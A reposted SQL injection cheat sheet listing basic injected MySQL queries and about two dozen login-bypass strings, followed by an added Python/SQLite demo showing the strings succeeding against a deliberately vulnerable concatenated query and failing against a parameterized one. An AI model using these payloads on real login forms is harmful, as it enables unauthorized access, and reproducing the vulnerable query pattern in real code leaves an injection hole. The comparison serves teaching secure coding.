SQL Injection cheat sheet
The following SQL Injection "tricks" are a collection from a website called 0x000000.com, which unfortunately is no longer available. I had them saved for a while and want to share them with you:
A collection of known and working SQL vectors. These vectors are designed and tested by me on my localhost. I kept the list clean and concise, tested for all MySQL versions to date unless stated otherwise. This sheet is under constant development, please come back often. Note that most of these vectors can be used on SQL Server or Oracle but mainly it is written and tested for MySQL only. What I give you here is basically everything you ever need to know about MySQL injection. You have to construct the pieces yourself and probably need to know what they do in order to use them.
Basics
SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
Use inside login form:
1' OR 1=1--
1' OR '1' = '1
'
''
'or"='
') or ('a'='a
") or ("a"="a
hi" or "a"="a
or a=a--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
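Added example (not part of the original sheet): why the login-form vectors above work against a query built by string concatenation, and why the same input is inert once the query uses bound parameters. It assumes an in-memory SQLite database standing in for MySQL; the function names and the `pass` column are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data. In-memory SQLite stands in for the MySQL
    # `login` table (assumption); the `pass` column is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    db.executemany("INSERT INTO login (user, pass) VALUES (?, ?)",
                   [("admin", "s3cret-A"), ("alice", "s3cret-B")])
    return db

def login_concat(db, user, password):
    """Deliberately vulnerable: form input is spliced into the SQL text."""
    sql = ("SELECT user FROM login WHERE user = '" + user +
           "' AND pass = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the spliced text was not valid SQL
    return row[0] if row else None

def login_param(db, user, password):
    """Hardened: placeholders keep the input as data, never as SQL."""
    row = db.execute("SELECT user FROM login WHERE user = ? AND pass = ?",
                     (user, password)).fetchone()
    return row[0] if row else None

# Four single-quote vectors taken from the list above.
VECTORS = ["1' OR '1' = '1", "admin'--", "' or 1=1--", "' or 'x'='x"]

def compare(db):
    """Submit each vector as both user name and password to both forms."""
    return {v: (login_concat(db, v, v), login_param(db, v, v)) for v in VECTORS}

if __name__ == "__main__":
    db = make_db()
    for vector, (concat, param) in compare(db).items():
        print(f"{vector!r:20} concat={concat!r:8} param={param!r}")
```

The double-quote variants in the list target queries that delimit strings with `"`; the parameterized form handles both the same way because the input never reaches the SQL parser as syntax.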